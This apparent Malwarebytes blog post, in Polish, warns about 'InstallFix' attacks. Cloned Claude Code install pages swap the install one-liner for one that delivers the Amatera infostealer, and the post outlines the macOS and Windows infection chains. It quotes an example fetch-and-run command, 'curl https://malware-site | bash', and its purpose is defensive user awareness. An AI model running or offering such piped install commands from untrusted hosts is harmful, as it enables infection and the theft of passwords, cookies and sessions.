Atakujący klonują strony instalacyjne popularnych narzędzi, takich jak Claude Code, i zamieniają jednowierszowe polecenia instalacyjne na złośliwe oprogramowanie, głównie w celu kradzieży haseł, plików cookie, sesji i dostępu do środowisk programistycznych.
Współczesne instrukcje instalacji często zalecają skopiowanie pojedynczego polecenia, takiego jak curl https://malware-site | bash w terminalu i naciśnij Enter. Ten nawyk sprawia, że strona internetowa staje się zdalnym pilotem: każdy skrypt znajdujący się pod tym adresem URL działa z Twoimi uprawnieniami, często uprawnieniami administratora.
Badacze odkryli, że osoby atakujące wykorzystują ten proces, zachowując wszystko bez zmian, a zmieniając jedynie miejsce, z którym łączy się ten jeden wiersz kodu. Dla wielu użytkowników, którzy dopiero zaczynają korzystać z AI i narzędzi programistycznych, ta metoda wydaje się normalna, więc nie są oni wystarczająco ostrożni.
Ale sprowadza się to w zasadzie do stwierdzenia „ufam tej domenie”, a to nie jest dobry pomysł, chyba że masz pewność, że można jej zaufać.
Zazwyczaj wygląda to tak. Ktoś wpisuje w wyszukiwarkę „Claude Code install” lub „Claude Code CLI”, widzi na górze sponsorowany wynik z wiarygodnym adresem URL i klika bez zastanowienia.
Jednak ta reklama prowadzi do sklonowanej strony z dokumentacją lub stroną pobierania: to samo logo, ten sam pasek boczny, ten sam tekst i znany przycisk „kopiuj” obok polecenia instalacji. W wielu przypadkach każde inne kliknięcie na tej fałszywej stronie po cichu przekierowuje użytkownika do prawdziwej strony dostawcy, więc nic innego nie wygląda podejrzanie.
Podobnie jak ataki ClickFix, metoda ta nosi nazwę InstallFix. Użytkownik uruchamia kod, który infekuje jego własny komputer pod fałszywym pretekstem, a ładunkiem jest zazwyczaj program typu infostealer.
Głównym ładunkiem w tych przypadkach InstallFix związanych z kodem Claude jest program do kradzieży informacji o nazwie Amatera. Skupia się on na danych przeglądarki, takich jak zapisane hasła, pliki cookie, tokeny sesji, dane autouzupełniania i ogólne informacje o systemie, które pomagają atakującym w profilowaniu urządzenia. Dzięki temu mogą oni przejąć sesje internetowe i zalogować się do pulpitów nawigacyjnych w chmurze oraz wewnętrznych paneli administracyjnych bez konieczności podawania rzeczywistego hasła. Niektóre raporty wspominają również o zainteresowaniu portfelami kryptowalutowymi i innymi kontami o wysokiej wartości.
Windows Mac
Kampania oparta na kodzie Claude, którą odkryli naukowcy, była przygotowana do ataków zarówno na Mac Windows Mac .
W systemie macOS złośliwy skrypt jednowierszowy zazwyczaj pobiera skrypt drugiego etapu z domeny kontrolowanej przez atakującego, często zaszyfrowany przy użyciu algorytmu base64, aby na pierwszy rzut oka wyglądał na niepotrzebny, ale nieszkodliwy. Następnie skrypt ten pobiera i uruchamia plik binarny z kolejnej domeny, usuwając atrybuty i nadając mu status pliku wykonywalnego przed uruchomieniem.
W Windows zaobserwowano, że polecenie powoduje tworzenie się cmd.exe, który następnie wywołuje mshta.exe za pomocą zdalnego adresu URL. Dzięki temu złośliwe oprogramowanie działa jako zaufany plik binarny firmy Microsoft, a nie jako oczywisty losowy plik wykonywalny. W obu przypadkach na ekranie nie pojawia się nic spektakularnego: użytkownik sądzi, że właśnie zainstalował narzędzie, podczas gdy rzeczywisty ładunek zaczyna po cichu wykonywać swoje zadanie w tle.
Jak zachować bezpieczeństwo
W obliczu szerzącego się zagrożenia ze strony programów ClickFix i InstallFix — które nie wydają się znikać w najbliższym czasie — ważne jest, aby być świadomym, ostrożnym i chronić się przed nimi.
- Zwolnij. Niespiesz sięz wykonywaniem instrukcji na stronie internetowej lub w monicie, zwłaszcza jeśli wymagają one uruchomienia poleceń na urządzeniu lub skopiowania i wklejenia kodu. Przed uruchomieniem polecenia przeanalizuj, jakie działania spowoduje ono.
- Unikaj uruchamiania poleceń lub skryptów z niezaufanych źródeł. Nigdy nieuruchamiaj kodu ani poleceń skopiowanych ze stron internetowych, wiadomości e-mail lub komunikatów, chyba że ufasz źródłu i rozumiesz cel działania. Zweryfikuj instrukcje niezależnie. Jeśli strona internetowa nakazuje wykonanie polecenia lub czynności technicznej, przed przystąpieniem do działania sprawdź oficjalną dokumentację lub skontaktuj się z pomocą techniczną.
- Ogranicz stosowanie funkcji kopiowania i wklejania poleceń. Ręcznewpisywanie poleceń zamiast kopiowania i wklejania może zmniejszyć ryzyko nieświadomego uruchomienia złośliwego oprogramowania ukrytego w skopiowanym tekście.
- Zabezpiecz swoje urządzenia. Korzystaj zaktualnegorozwiązania antywirusowegodziałającego w czasie rzeczywistym, wyposażonego w komponent ochrony sieciowej.
- Zdobądź wiedzę na temat ewoluujących technik ataków.Świadomość, że ataki mogą pochodzić z nieoczekiwanych źródeł i ewoluować, pomaga zachować czujność. Czytaj dalej naszego bloga!
Porada dla profesjonalistów:Czy wiesz, że bezpłatny program Malwarebytes Browser Guard ostrzega Cię, gdy strona internetowa próbuje skopiować coś do schowka?
Nie tylko informujemy o zagrożeniach - my je usuwamy
Zagrożenia cyberbezpieczeństwa nigdy nie powinny wykraczać poza nagłówek. Chroń swoje urządzenia przed zagrożeniami, pobierając Malwarebytes już dziś.
